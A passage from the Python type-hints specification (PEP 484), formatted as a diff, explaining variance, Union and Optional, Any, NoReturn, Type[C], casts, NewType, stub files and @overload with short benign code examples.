+mgrs = ImmutableList([Manager()])  # type: ImmutableList[Manager]
+dump_employees(mgrs)  # OK
+
+
+

The read-only collection classes in typing are all declared +covariant in their type variable (e.g. Mapping and Sequence). The +mutable collection classes (e.g. MutableMapping and +MutableSequence) are declared invariant. The one example of +a contravariant type is the Generator type, which is contravariant +in the send() argument type (see below).
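
A short sketch of the practical consequence (reusing Employee and
Manager from the previous example):

from typing import List, MutableSequence, Sequence

class Employee: ...
class Manager(Employee): ...

def read_names(emps: Sequence[Employee]) -> None: ...

def hire(emps: MutableSequence[Employee]) -> None:
    emps.append(Employee())

mgrs = [Manager()]  # type: List[Manager]
read_names(mgrs)  # OK: Sequence is covariant in its element type
hire(mgrs)        # Error: MutableSequence is invariant; the call could put
                  # a plain Employee into a List[Manager]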

+

Note: Covariance or contravariance is not a property of a type variable, +but a property of a generic class defined using this variable. +Variance is only applicable to generic types; generic functions +do not have this property. The latter should be defined using only +type variables without covariant or contravariant keyword arguments. +For example, the following example is +fine:

+
from typing import TypeVar
+
+class Employee: ...
+
+class Manager(Employee): ...
+
+E = TypeVar('E', bound=Employee)
+
+def dump_employee(e: E) -> None: ...
+
+dump_employee(Manager())  # OK
+
+
+

while the following is prohibited:

+
B_co = TypeVar('B_co', covariant=True)
+
+def bad_func(x: B_co) -> B_co:  # Flagged as error by a type checker
+    ...
+
+
+
+
+

The numeric tower

+

PEP 3141 defines Python’s numeric tower, and the stdlib module +numbers implements the corresponding ABCs (Number, +Complex, Real, Rational and Integral). There are some +issues with these ABCs, but the built-in concrete numeric classes +complex, float and int are ubiquitous (especially the +latter two :-).

+

Rather than requiring that users write import numbers and then use +numbers.Float etc., this PEP proposes a straightforward shortcut +that is almost as effective: when an argument is annotated as having +type float, an argument of type int is acceptable; similarly, +for an argument annotated as having type complex, arguments of +type float or int are acceptable. This does not handle +classes implementing the corresponding ABCs or the +fractions.Fraction class, but we believe those use cases are +exceedingly rare.
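
For example (a small sketch of the shortcut in action):

def scale(x: float, factor: float) -> float:
    return x * factor

scale(2, 10)    # OK: int is acceptable where float is expected

def magnitude(z: complex) -> float:
    return abs(z)

magnitude(3)    # OK: int is acceptable where complex is expected
magnitude(1.5)  # OK: float is acceptable where complex is expected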

+
+
+

Forward references

+

When a type hint contains names that have not been defined yet, that +definition may be expressed as a string literal, to be resolved later.

+

A situation where this occurs commonly is the definition of a +container class, where the class being defined occurs in the signature +of some of the methods. For example, the following code (the start of +a simple binary tree implementation) does not work:

+
class Tree:
+    def __init__(self, left: Tree, right: Tree):
+        self.left = left
+        self.right = right
+
+
+

To address this, we write:

+
class Tree:
+    def __init__(self, left: 'Tree', right: 'Tree'):
+        self.left = left
+        self.right = right
+
+
+

The string literal should contain a valid Python expression (i.e., +compile(lit, '', 'eval') should be a valid code object) and it +should evaluate without errors once the module has been fully loaded. +The local and global namespace in which it is evaluated should be the +same namespaces in which default arguments to the same function would +be evaluated.

+

Moreover, the expression should be parseable as a valid type hint, i.e., +it is constrained by the rules from the section Acceptable type hints +above.

+

It is allowable to use string literals as part of a type hint, for +example:

+
class Tree:
+    ...
+    def leaves(self) -> List['Tree']:
+        ...
+
+
+

A common use for forward references is when e.g. Django models are +needed in the signatures. Typically, each model is in a separate +file, and has methods taking arguments whose type involves other models. +Because of the way circular imports work in Python, it is often not +possible to import all the needed models directly:

+
# File models/a.py
+from models.b import B
+class A(Model):
+    def foo(self, b: B): ...
+
+# File models/b.py
+from models.a import A
+class B(Model):
+    def bar(self, a: A): ...
+
+# File main.py
+from models.a import A
+from models.b import B
+
+
+

Assuming main is imported first, this will fail with an ImportError at +the line from models.a import A in models/b.py, which is being +imported from models/a.py before module a has defined class A. The solution +is to switch to module-only imports and reference the models by their +module.class name:

+
# File models/a.py
+from models import b
+class A(Model):
+    def foo(self, b: 'b.B'): ...
+
+# File models/b.py
+from models import a
+class B(Model):
+    def bar(self, a: 'a.A'): ...
+
+# File main.py
+from models.a import A
+from models.b import B
+
+
+
+
+

Union types

+

Since accepting a small, limited set of expected types for a single +argument is common, there is a new special factory called Union. +Example:

+
from typing import Union
+
+def handle_employees(e: Union[Employee, Sequence[Employee]]) -> None:
+    if isinstance(e, Employee):
+        e = [e]
+    ...
+
+
+

A type factored by Union[T1, T2, ...] is a supertype +of all types T1, T2, etc., so that a value that +is a member of one of these types is acceptable for an argument +annotated by Union[T1, T2, ...].

+

One common case of union types is optional types. By default, +None is an invalid value for any type, unless a default value of +None has been provided in the function definition. Examples:

+
def handle_employee(e: Union[Employee, None]) -> None: ...
+
+
+

As a shorthand for Union[T1, None] you can write Optional[T1]; +for example, the above is equivalent to:

+
from typing import Optional
+
+def handle_employee(e: Optional[Employee]) -> None: ...
+
+
+

A past version of this PEP allowed type checkers to assume an optional +type when the default value is None, as in this code:

+
def handle_employee(e: Employee = None): ...
+
+
+

This would have been treated as equivalent to:

+
def handle_employee(e: Optional[Employee] = None) -> None: ...
+
+
+

This is no longer the recommended behavior. Type checkers should move +towards requiring the optional type to be made explicit.

+
+
+

Support for singleton types in unions

+

A singleton instance is frequently used to mark some special condition, +in particular in situations where None is also a valid value +for a variable. Example:

+
_empty = object()
+
+def func(x=_empty):
+    if x is _empty:  # default argument value
+        return 0
+    elif x is None:  # argument was provided and it's None
+        return 1
+    else:
+        return x * 2
+
+
+

To allow precise typing in such situations, the user should use +the Union type in conjunction with the enum.Enum class provided +by the standard library, so that type errors can be caught statically:

+
from typing import Union
+from enum import Enum
+
+class Empty(Enum):
+    token = 0
+_empty = Empty.token
+
+def func(x: Union[int, None, Empty] = _empty) -> int:
+
+    boom = x * 42  # This fails type check
+
+    if x is _empty:
+        return 0
+    elif x is None:
+        return 1
+    else:  # At this point typechecker knows that x can only have type int
+        return x * 2
+
+
+

Since the subclasses of Enum cannot be further subclassed, +the type of variable x can be statically inferred in all branches +of the above example. The same approach is applicable if more than one +singleton object is needed: one can use an enumeration that has more than +one value:

+
class Reason(Enum):
+    timeout = 1
+    error = 2
+
+def process(response: Union[str, Reason] = '') -> str:
+    if response is Reason.timeout:
+        return 'TIMEOUT'
+    elif response is Reason.error:
+        return 'ERROR'
+    else:
+        # response can be only str, all other possible values exhausted
+        return 'PROCESSED: ' + response
+
+
+
+
+

The Any type

+

A special kind of type is Any. Every type is consistent with +Any. It can be considered a type that has all values and all methods. +Note that Any and the builtin type object are completely different.

+

When the type of a value is object, the type checker will reject +almost all operations on it, and assigning it to a variable (or using +it as a return value) of a more specialized type is a type error. On +the other hand, when a value has type Any, the type checker will +allow all operations on it, and a value of type Any can be assigned +to a variable (or used as a return value) of a more constrained type.
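
A sketch of the asymmetry (both functions are hypothetical):

from typing import Any

def f(x: Any) -> None:
    x.anything()  # OK for the checker: Any permits all operations
    s = x         # type: str  # OK: Any is assignable to a narrower type

def g(x: object) -> None:
    x.anything()  # Error: object has no attribute 'anything'
    s = x         # type: str  # Error: object is not assignable to str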

+

A function parameter without an annotation is assumed to be annotated with +Any. If a generic type is used without specifying type parameters, +they are assumed to be Any:

+
from typing import Mapping
+
+def use_map(m: Mapping) -> None:  # Same as Mapping[Any, Any]
+    ...
+
+
+

This rule also applies to Tuple, in annotation context it is equivalent +to Tuple[Any, ...] and, in turn, to tuple. As well, a bare +Callable in an annotation is equivalent to Callable[..., Any] and, +in turn, to collections.abc.Callable:

+
from typing import Tuple, List, Callable
+
+def check_args(args: Tuple) -> bool:
+    ...
+
+check_args(())           # OK
+check_args((42, 'abc'))  # Also OK
+check_args(3.14)         # Flagged as error by a type checker
+
+# A list of arbitrary callables is accepted by this function
+def apply_callbacks(cbs: List[Callable]) -> None:
+    ...
+
+
+
+
+

The NoReturn type

+

The typing module provides a special type NoReturn to annotate functions +that never return normally. For example, a function that unconditionally +raises an exception:

+
from typing import NoReturn
+
+def stop() -> NoReturn:
+    raise RuntimeError('no way')
+
+
+

The NoReturn annotation is used for functions such as sys.exit. +Static type checkers will ensure that functions annotated as returning +NoReturn truly never return, either implicitly or explicitly:

+
import sys
+from typing import NoReturn
+
+def f(x: int) -> NoReturn:  # Error, f(0) implicitly returns None
+    if x != 0:
+        sys.exit(1)
+
+
+

The checkers will also recognize that the code after calls to such functions +is unreachable and will behave accordingly:

+
# continue from first example
+def g(x: int) -> int:
+    if x > 0:
+        return x
+    stop()
+    return 'whatever works'  # Error might be not reported by some checkers
+                             # that ignore errors in unreachable blocks
+
+
+

The NoReturn type is only valid as a return annotation of functions, +and considered an error if it appears in other positions:

+
from typing import List, NoReturn
+
+# All of the following are errors
+def bad1(x: NoReturn) -> int:
+    ...
+bad2 = None  # type: NoReturn
+def bad3() -> List[NoReturn]:
+    ...
+
+
+
+
+

The type of class objects

+

Sometimes you want to talk about class objects, in particular class +objects that inherit from a given class. This can be spelled as +Type[C] where C is a class. To clarify: while C (when +used as an annotation) refers to instances of class C, Type[C] +refers to subclasses of C. (This is a similar distinction as +between object and type.)

+

For example, suppose we have the following classes:

+
class User: ...  # Abstract base for User classes
+class BasicUser(User): ...
+class ProUser(User): ...
+class TeamUser(User): ...
+
+
+

And suppose we have a function that creates an instance of one of +these classes if you pass it a class object:

+
def new_user(user_class):
+    user = user_class()
+    # (Here we could write the user object to a database)
+    return user
+
+
+

Without Type[] the best we could do to annotate new_user() +would be:

+
def new_user(user_class: type) -> User:
+    ...
+
+
+

However using Type[] and a type variable with an upper bound we +can do much better:

+
U = TypeVar('U', bound=User)
+def new_user(user_class: Type[U]) -> U:
+    ...
+
+
+

Now when we call new_user() with a specific subclass of User a +type checker will infer the correct type of the result:

+
joe = new_user(BasicUser)  # Inferred type is BasicUser
+
+
+

The value corresponding to Type[C] must be an actual class object +that’s a subtype of C, not a special form. In other words, in the +above example calling e.g. new_user(Union[BasicUser, ProUser]) is +rejected by the type checker (in addition to failing at runtime +because you can’t instantiate a union).

+

Note that it is legal to use a union of classes as the parameter for +Type[], as in:

+
def new_non_team_user(user_class: Type[Union[BasicUser, ProUser]]):
+    user = new_user(user_class)
+    ...
+
+
+

However the actual argument passed in at runtime must still be a +concrete class object, e.g. in the above example:

+
new_non_team_user(ProUser)  # OK
+new_non_team_user(TeamUser)  # Disallowed by type checker
+
+
+

Type[Any] is also supported (see below for its meaning).

+

Type[T] where T is a type variable is allowed when annotating the +first argument of a class method (see the relevant section).

+

Any other special constructs like Tuple or Callable are not allowed +as an argument to Type.

+

There are some concerns with this feature: for example when +new_user() calls user_class() this implies that all subclasses +of User must support this in their constructor signature. However +this is not unique to Type[]: class methods have similar concerns. +A type checker ought to flag violations of such assumptions, but by +default constructor calls that match the constructor signature in the +indicated base class (User in the example above) should be +allowed. A program containing a complex or extensible class hierarchy +might also handle this by using a factory class method. A future +revision of this PEP may introduce better ways of dealing with these +concerns.
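
One possible shape of the factory-class-method approach mentioned
above (a sketch only; the names are illustrative, and the classmethod
annotation pattern is the one described in a later section):

from typing import Type, TypeVar

T = TypeVar('T', bound='User')

class User:
    def __init__(self, name: str) -> None:
        self.name = name

    @classmethod
    def create(cls: Type[T], name: str) -> T:
        # Subclasses whose __init__ differs can override create(),
        # so callers never depend on each constructor's signature.
        return cls(name)

class ProUser(User): ...

def new_user(user_class: Type[T]) -> T:
    return user_class.create('guest')

pro = new_user(ProUser)  # inferred type is ProUser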

+

When Type is parameterized it requires exactly one parameter. +Plain Type without brackets is equivalent to Type[Any] and +this in turn is equivalent to type (the root of Python’s metaclass +hierarchy). This equivalence also motivates the name, Type, as +opposed to alternatives like Class or SubType, which were +proposed while this feature was under discussion; this is similar to +the relationship between e.g. List and list.

+

Regarding the behavior of Type[Any] (or Type or type), +accessing attributes of a variable with this type only provides +attributes and methods defined by type (for example, +__repr__() and __mro__). Such a variable can be called with +arbitrary arguments, and the return type is Any.

+

Type is covariant in its parameter, because Type[Derived] is a +subtype of Type[Base]:

+
def new_pro_user(pro_user_class: Type[ProUser]):
+    user = new_user(pro_user_class)  # OK
+    ...
+
+
+
+
+

Annotating instance and class methods

+

In most cases the first argument of class and instance methods +does not need to be annotated, and it is assumed to have the +type of the containing class for instance methods, and a type object +type corresponding to the containing class object for class methods. +In addition, the first argument in an instance method can be annotated +with a type variable. In this case the return type may use the same +type variable, thus making that method a generic function. For example:

+
T = TypeVar('T', bound='Copyable')
+class Copyable:
+    def copy(self: T) -> T:
+        # return a copy of self
+
+class C(Copyable): ...
+c = C()
+c2 = c.copy()  # type here should be C
+
+
+

The same applies to class methods using Type[] in an annotation +of the first argument:

+
T = TypeVar('T', bound='C')
+class C:
+    @classmethod
+    def factory(cls: Type[T]) -> T:
+        # make a new instance of cls
+
+class D(C): ...
+d = D.factory()  # type here should be D
+
+
+

Note that some type checkers may apply restrictions on this use, such as +requiring an appropriate upper bound for the type variable used +(see examples).

+
+
+

Version and platform checking

+

Type checkers are expected to understand simple version and platform +checks, e.g.:

+
import sys
+
+if sys.version_info[0] >= 3:
+    # Python 3 specific definitions
+else:
+    # Python 2 specific definitions
+
+if sys.platform == 'win32':
+    # Windows specific definitions
+else:
+    # Posix specific definitions
+
+
+

Don’t expect a checker to understand obfuscations like +"".join(reversed(sys.platform)) == "xunil".

+
+
+

Runtime or type checking?

+

Sometimes there’s code that must be seen by a type checker (or other +static analysis tools) but should not be executed. For such +situations the typing module defines a constant, +TYPE_CHECKING, that is considered True during type checking +(or other static analysis) but False at runtime. Example:

+
import typing
+
+if typing.TYPE_CHECKING:
+    import expensive_mod
+
+def a_func(arg: 'expensive_mod.SomeClass') -> None:
+    a_var = arg  # type: expensive_mod.SomeClass
+    ...
+
+
+

(Note that the type annotation must be enclosed in quotes, making it a +“forward reference”, to hide the expensive_mod reference from the +interpreter runtime. In the # type comment no quotes are needed.)

+

This approach may also be useful to handle import cycles.

+
+
+

Arbitrary argument lists and default argument values

+

Arbitrary argument lists can be type annotated as well, +so that the definition:

+
def foo(*args: str, **kwds: int): ...
+
+
+

is acceptable and it means that, e.g., all of the following +represent function calls with valid types of arguments:

+
foo('a', 'b', 'c')
+foo(x=1, y=2)
+foo('', z=0)
+
+
+

In the body of function foo, the type of variable args is +deduced as Tuple[str, ...] and the type of variable kwds +is Dict[str, int].

+

In stubs it may be useful to declare an argument as having a default +without specifying the actual default value. For example:

+
def foo(x: AnyStr, y: AnyStr = ...) -> AnyStr: ...
+
+
+

What should the default value look like? Any of the options "", +b"" or None fails to satisfy the type constraint.

+

In such cases the default value may be specified as a literal +ellipsis, i.e. the above example is literally what you would write.

+
+
+

Positional-only arguments

+

Some functions are designed to take their arguments only positionally, +and expect their callers never to use the argument’s name to provide +that argument by keyword. All arguments with names beginning with +__ are assumed to be positional-only, except if their names also +end with __:

+
def quux(__x: int, __y__: int = 0) -> None: ...
+
+quux(3, __y__=1)  # This call is fine.
+
+quux(__x=3)  # This call is an error.
+
+
+
+
+

Annotating generator functions and coroutines

+

The return type of generator functions can be annotated by +the generic type Generator[yield_type, send_type, +return_type] provided by the typing.py module:

+
def echo_round() -> Generator[int, float, str]:
+    res = yield
+    while res:
+        res = yield round(res)
+    return 'OK'
+
+
+

Coroutines introduced in PEP 492 are annotated with the same syntax as +ordinary functions. However, the return type annotation corresponds to the +type of the await expression, not to the coroutine type:

+
async def spam(ignored: int) -> str:
+    return 'spam'
+
+async def foo() -> None:
+    bar = await spam(42)  # type: str
+
+
+

The typing.py module provides a generic version of ABC +collections.abc.Coroutine to specify awaitables that also support +send() and throw() methods. The variance and order of type variables +correspond to those of Generator, namely Coroutine[T_co, T_contra, V_co], +for example:

+
from typing import List, Coroutine
+c = None  # type: Coroutine[List[str], str, int]
+...
+x = c.send('hi')  # type: List[str]
+async def bar() -> None:
+    x = await c  # type: int
+
+
+

The module also provides generic ABCs Awaitable, +AsyncIterable, and AsyncIterator for situations where more precise +types cannot be specified:

+
def op() -> typing.Awaitable[str]:
+    if cond:
+        return spam(42)
+    else:
+        return asyncio.Future(...)
+
+
+
+
+
+

Compatibility with other uses of function annotations

+

A number of existing or potential use cases for function annotations +exist, which are incompatible with type hinting. These may confuse +a static type checker. However, since type hinting annotations have no +runtime behavior (other than evaluation of the annotation expression and +storing annotations in the __annotations__ attribute of the function +object), this does not make the program incorrect – it just may cause +a type checker to emit spurious warnings or errors.

+

To mark portions of the program that should not be covered by type +hinting, you can use one or more of the following:

+
    +
  • a # type: ignore comment;
  • +
  • a @no_type_check decorator on a class or function;
  • +
  • a custom class or function decorator marked with +@no_type_check_decorator.
  • +
+

For more details see later sections.

+

In order for maximal compatibility with offline type checking it may +eventually be a good idea to change interfaces that rely on annotations +to switch to a different mechanism, for example a decorator. In Python +3.5 there is no pressure to do this, however. See also the longer +discussion under Rejected alternatives below.

+
+
+

Type comments

+

No first-class syntax support for explicitly marking variables as being +of a specific type is added by this PEP. To help with type inference in +complex cases, a comment of the following format may be used:

+
x = []                # type: List[Employee]
+x, y, z = [], [], []  # type: List[int], List[int], List[str]
+x, y, z = [], [], []  # type: (List[int], List[int], List[str])
+a, b, *c = range(5)   # type: float, float, List[float]
+x = [1, 2]            # type: List[int]
+
+
+

Type comments should be put on the last line of the statement that +contains the variable definition. They can also be placed on +with statements and for statements, right after the colon.

+

Examples of type comments on with and for statements:

+
with frobnicate() as foo:  # type: int
+    # Here foo is an int
+    ...
+
+for x, y in points:  # type: float, float
+    # Here x and y are floats
+    ...
+
+
+

In stubs it may be useful to declare the existence of a variable +without giving it an initial value. This can be done using PEP 526 +variable annotation syntax:

+
from typing import IO
+
+stream: IO[str]
+
+
+

The above syntax is acceptable in stubs for all versions of Python. +However, in non-stub code for versions of Python 3.5 and earlier +there is a special case:

+
from typing import IO
+
+stream = None  # type: IO[str]
+
+
+

Type checkers should not complain about this (despite the value +None not matching the given type), nor should they change the +inferred type to Optional[...] (despite the rule that does this +for annotated arguments with a default value of None). The +assumption here is that other code will ensure that the variable is +given a value of the proper type, and all uses can assume that the +variable has the given type.

+

The # type: ignore comment should be put on the line that the +error refers to:

+
import http.client
+errors = {
+    'not_found': http.client.NOT_FOUND  # type: ignore
+}
+
+
+

A # type: ignore comment on a line by itself at the top of a file, +before any docstrings, imports, or other executable code, silences all +errors in the file. Blank lines and other comments, such as shebang +lines and coding cookies, may precede the # type: ignore comment.

+

In some cases, linting tools or other comments may be needed on the same +line as a type comment. In these cases, the type comment should be before +other comments and linting markers:

+
+
# type: ignore # <comment or other marker>
+

If type hinting proves useful in general, a syntax for typing variables +may be provided in a future Python version. (UPDATE: This syntax +was added in Python 3.6 through PEP 526.)

+
+
+

Casts

+

Occasionally the type checker may need a different kind of hint: the +programmer may know that an expression is of a more constrained type +than a type checker may be able to infer. For example:

+
from typing import List, cast
+
+def find_first_str(a: List[object]) -> str:
+    index = next(i for i, x in enumerate(a) if isinstance(x, str))
+    # We only get here if there's at least one string in a
+    return cast(str, a[index])
+
+
+

Some type checkers may not be able to infer that the type of +a[index] is str and only infer object or Any, but we +know that (if the code gets to that point) it must be a string. The +cast(t, x) call tells the type checker that we are confident that +the type of x is t. At runtime a cast always returns the +expression unchanged – it does not check the type, and it does not +convert or coerce the value.

+

Casts differ from type comments (see the previous section). When using +a type comment, the type checker should still verify that the inferred +type is consistent with the stated type. When using a cast, the type +checker should blindly believe the programmer. Also, casts can be used +in expressions, while type comments only apply to assignments.

+
+
+

NewType helper function

+

There are also situations where a programmer might want to avoid logical +errors by creating simple classes. For example:

+
class UserId(int):
+    pass
+
+def get_by_user_id(user_id: UserId):
+    ...
+
+
+

However, this approach introduces a runtime overhead. To avoid this, +typing.py provides a helper function NewType that creates +simple unique types with almost zero runtime overhead. For a static type +checker Derived = NewType('Derived', Base) is roughly equivalent +to a definition:

+
class Derived(Base):
+    def __init__(self, _x: Base) -> None:
+        ...
+
+
+

At runtime, meanwhile, NewType('Derived', Base) returns a dummy function +that simply returns its argument. Type checkers require explicit casts +from int where UserId is expected, while implicitly casting +from UserId where int is expected. Examples:

+
UserId = NewType('UserId', int)
+
+def name_by_id(user_id: UserId) -> str:
+    ...
+
+UserId('user')          # Fails type check
+
+name_by_id(42)          # Fails type check
+name_by_id(UserId(42))  # OK
+
+num = UserId(5) + 1     # type: int
+
+
+

NewType accepts exactly two arguments: a name for the new unique type, +and a base class. The latter should be a proper class (i.e., +not a type construct like Union, etc.), or another unique type created +by calling NewType. The function returned by NewType +accepts only one argument; this is equivalent to supporting only one +constructor accepting an instance of the base class (see above). Example:

+
class PacketId:
+    def __init__(self, major: int, minor: int) -> None:
+        self._major = major
+        self._minor = minor
+
+TcpPacketId = NewType('TcpPacketId', PacketId)
+
+packet = PacketId(100, 100)
+tcp_packet = TcpPacketId(packet)  # OK
+
+tcp_packet = TcpPacketId(127, 0)  # Fails in type checker and at runtime
+
+
+

Both isinstance and issubclass, as well as subclassing will fail +for NewType('Derived', Base) since function objects don’t support +these operations.
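
Concretely (a sketch of the runtime behavior; the failing lines are
shown commented out):

from typing import NewType

UserId = NewType('UserId', int)

isinstance(UserId(5), int)       # True: the value is a plain int at runtime
# isinstance(UserId(5), UserId)  # TypeError: UserId is just a function
# issubclass(UserId, int)        # TypeError, for the same reason
# class AdminId(UserId): ...     # TypeError: a function cannot be subclassed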

+
+
+

Stub Files

+

Stub files are files containing type hints that are only for use by +the type checker, not at runtime. There are several use cases for +stub files:

+
    +
  • Extension modules
  • +
  • Third-party modules whose authors have not yet added type hints
  • +
  • Standard library modules for which type hints have not yet been +written
  • +
  • Modules that must be compatible with Python 2 and 3
  • +
  • Modules that use annotations for other purposes
  • +
+

Stub files have the same syntax as regular Python modules. There is one +feature of the typing module that is different in stub files: +the @overload decorator described below.

+

The type checker should only check function signatures in stub files; +it is recommended that function bodies in stub files just be a single +ellipsis (...).

+

The type checker should have a configurable search path for stub files. +If a stub file is found the type checker should not read the +corresponding “real” module.

+

While stub files are syntactically valid Python modules, they use the +.pyi extension to make it possible to maintain stub files in the +same directory as the corresponding real module. This also reinforces +the notion that no runtime behavior should be expected of stub files.

+

Additional notes on stub files:

+
    +
  • Modules and variables imported into the stub are not considered +exported from the stub unless the import uses the import ... as +... form or the equivalent from ... import ... as ... form. +(UPDATE: To clarify, the intention here is that only names +imported using the form X as X will be exported, i.e. the name +before and after as must be the same.) A sketch +illustrating these export rules follows this list.
  • +
  • However, as an exception to the previous bullet, all objects +imported into a stub using from ... import * are considered +exported. (This makes it easier to re-export all objects from a +given module that may vary by Python version.)
  • +
  • Just like in normal Python files, submodules +automatically become exported attributes of their parent module +when imported. For example, if the spam package has the +following directory structure:
    spam/
    +    __init__.pyi
    +    ham.pyi
    +
    +
    +

    where __init__.pyi contains a line such as from . import ham +or from .ham import Ham, then ham is an exported attribute +of spam.

    +
  • +
  • Stub files may be incomplete. To make type checkers aware of this, the file +can contain the following code:
    def __getattr__(name) -> Any: ...
    +
    +
    +

    Any identifier not defined in the stub is therefore assumed to be of type +Any.

    +
  • +
+
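
To illustrate the export rules above, a sketch of a hypothetical
stub (all module and class names here are made up):

# File spam/__init__.pyi

from . import ham as ham       # exported: uses the "X as X" form
from .ham import Ham as Ham    # exported
from ._compat import *         # everything from _compat is re-exported

import sys                     # not exported: plain import without "as"
from .ham import HamBase       # not exported: no "as HamBase"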
+

Function/method overloading

+

The @overload decorator allows describing functions and methods +that support multiple different combinations of argument types. This +pattern is used frequently in builtin modules and types. For example, +the __getitem__() method of the bytes type can be described as +follows:

+
from typing import overload
+
+class bytes:
+    ...
+    @overload
+    def __getitem__(self, i: int) -> int: ...
+    @overload
+    def __getitem__(self, s: slice) -> bytes: ...
+
+
+

This description is more precise than would be possible using unions +(which cannot express the relationship between the argument and return +types):

+
from typing import Union
+
+class bytes:
+    ...
+    def __getitem__(self, a: Union[int, slice]) -> Union[int, bytes]: ...
+
+
+

Another example where @overload comes in handy is the type of the +builtin map() function, which takes a different number of +arguments depending on the type of the callable:

+
from typing import Callable, Iterable, Iterator, Tuple, TypeVar, overload
+
+T1 = TypeVar('T1')
+T2 = TypeVar('T2')
+S = TypeVar('S')
+
+@overload
+def map(func: Callable[[T1], S], iter1: Iterable[T1]) -> Iterator[S]: ...
+@overload
+def map(func: Callable[[T1, T2], S],
+        iter1: Iterable[T1], iter2: Iterable[T2]) -> Iterator[S]: ...
+# ... and we could add more items to support more than two iterables
+
+
+

Note that we could also easily add items to support map(None, ...):

+
@overload
+def map(func: None, iter1: Iterable[T1]) -> Iterable[T1]: ...
+@overload
+def map(func: None,
+        iter1: Iterable[T1],
+        iter2: Iterable[T2]) -> Iterable[Tuple[T1, T2]]: ...
+
+
+

Uses of the @overload decorator as shown above are suitable for +stub files. In regular modules, a series of @overload-decorated +definitions must be followed by exactly one +non-@overload-decorated definition (for the same function/method). +The @overload-decorated definitions are for the benefit of the +type checker only, since they will be overwritten by the +non-@overload-decorated definition, while the latter is used at +runtime but should be ignored by a type checker. At runtime, calling +an @overload-decorated function directly will raise +NotImplementedError. Here’s an example of a non-stub overload +that can’t easily be expressed using a union or a type variable:

+
@overload
+def utf8(value: None) -> None:
+    pass
+@overload
+def utf8(value: bytes) -> bytes:
+    pass
+@overload
+def utf8(value: unicode) -> bytes:
+    pass
+def utf8(value):
+    <actual implementation>
+
+
+

NOTE: While it would be possible to provide a multiple dispatch +implementation using this syntax, its implementation would require +using sys._getframe(), which is frowned upon. Also, designing and +implementing an efficient multiple dispatch mechanism is hard, which +is why previous attempts were abandoned in favor of +functools.singledispatch(). (See PEP 443, especially its section +“Alternative approaches”.) In the future we may come up with a +satisfactory multiple dispatch design, but we don’t want such a design +to be constrained by the overloading syntax defined for type hints in +stub files. It is also possible that both features will develop +independent from each other (since overloading in the type checker +has different use cases and requirements than multiple dispatch +at runtime – e.g. the latter is unlikely to support generic types).

+

A constrained TypeVar type can often be used instead of using the +@overload decorator. For example, the definitions of concat1 +and concat2 in this stub file are equivalent:

+
from typing import TypeVar, Text
+
+AnyStr = TypeVar('AnyStr', Text, bytes)
+
+def concat1(x: AnyStr, y: AnyStr) -> AnyStr: ...
+
+@overload
+def concat2(x: str, y: str) -> str: ...
+@overload
+def concat2(x: bytes, y: bytes) -> bytes: ...
+
+
+

Some functions, such as map or bytes.__getitem__ above, can’t +be represented precisely using type variables. However, unlike +@overload, type variables can also be used outside stub files. We +recommend that @overload is only used in cases where a type +variable is not sufficient, due to its special stub-only status.

+

Another important difference between type variables such as AnyStr +and using @overload is that the former can also be used to define +constraints for generic class type parameters. For example, the type +parameter of the generic class typing.IO is constrained (only +IO[str], IO[bytes] and IO[Any] are valid):

+
class IO(Generic[AnyStr]): ...
+
+
+
+
+

Storing and distributing stub files

+

The easiest form of stub file storage and distribution is to put them +alongside Python modules in the same directory. This makes them easy to +find by both programmers and the tools. However, since package +maintainers are free not to add type hinting to their packages, +third-party stubs installable by pip from PyPI are also supported. +In this case we have to consider three issues: naming, versioning, +installation path.

+

This PEP does not provide a recommendation on a naming scheme that +should be used for third-party stub file packages. Discoverability will +hopefully be based on package popularity, like with Django packages for +example.

+

Third-party stubs have to be versioned using the lowest version of the +source package that is compatible. Example: FooPackage has versions +1.0, 1.1, 1.2, 1.3, 2.0, 2.1, 2.2. There are API changes in versions +1.1, 2.0 and 2.2. The stub file package maintainer is free to release +stubs for all versions but at least 1.0, 1.1, 2.0 and 2.2 are needed +to enable the end user to type check all versions. This is because the +user knows that the closest lower or equal version of stubs is +compatible. In the provided example, for FooPackage 1.3 the user would +choose stubs version 1.1.

+

Note that if the user decides to use the “latest” available source +package, using the “latest” stub files should generally also work if +they’re updated often.

+

Third-party stub packages can use any location for stub storage. Type +checkers should search for them using PYTHONPATH. A default fallback +directory that is always checked is shared/typehints/pythonX.Y/ (for +some PythonX.Y as determined by the type checker, not just the installed +version). Since there can only be one package installed for a given Python +version per environment, no additional versioning is performed under that +directory (just like bare directory installs by pip in site-packages). +Stub file package authors might use the following snippet in setup.py:

+
...
+data_files=[
+    (
+        'shared/typehints/python{}.{}'.format(*sys.version_info[:2]),
+        pathlib.Path(SRC_PATH).glob('**/*.pyi'),
+    ),
+],
+...
+
+
+

(UPDATE: As of June 2018 the recommended way to distribute type +hints for third-party packages has changed – in addition to typeshed +(see the next section) there is now a standard for distributing type +hints, PEP 561. It supports separately installable packages containing +stubs, stub files included in the same distribution as the executable +code of a package, and inline type hints, the latter two options +enabled by including a file named py.typed in the package.)

+
+
+

The Typeshed Repo

+

There is a shared repository where useful stubs are being +collected. Policies regarding the stubs collected here will be +decided separately and reported in the repo’s documentation. +Note that stubs for a given package will not be included here +if the package owners have specifically requested that they be omitted.

+
+
+
+

Exceptions

+

No syntax for listing explicitly raised exceptions is proposed. +Currently the only known use case for this feature is documentational, +in which case the recommendation is to put this information in a +docstring.

+
+
+

The typing Module

+

To open the usage of static type checking to Python 3.5 as well as older +versions, a uniform namespace is required. For this purpose, a new +module in the standard library is introduced called typing.

+

It defines the fundamental building blocks for constructing types +(e.g. Any), types representing generic variants of builtin +collections (e.g. List), types representing generic +collection ABCs (e.g. Sequence), and a small collection of +convenience definitions.

+

Note that special type constructs, such as Any, Union, +and type variables defined using TypeVar are only supported +in the type annotation context, and Generic may only be used +as a base class. All of these (except for unparameterized generics) +will raise TypeError if they appear in isinstance or issubclass.

+

Fundamental building blocks:

+
    +
  • Any, used as def get(key: str) -> Any: ...
  • +
  • Union, used as Union[Type1, Type2, Type3]
  • +
  • Callable, used as Callable[[Arg1Type, Arg2Type], ReturnType]
  • +
  • Tuple, used by listing the element types, for example +Tuple[int, int, str]. +The empty tuple can be typed as Tuple[()]. +Arbitrary-length homogeneous tuples can be expressed +using one type and ellipsis, for example Tuple[int, ...]. +(The ... here are part of the syntax, a literal ellipsis.)
  • +
  • TypeVar, used as X = TypeVar('X', Type1, Type2, Type3) or simply +Y = TypeVar('Y') (see above for more details)
  • +
  • Generic, used to create user-defined generic classes
  • +
  • Type, used to annotate class objects
  • +
+

Generic variants of builtin collections:

+
    +
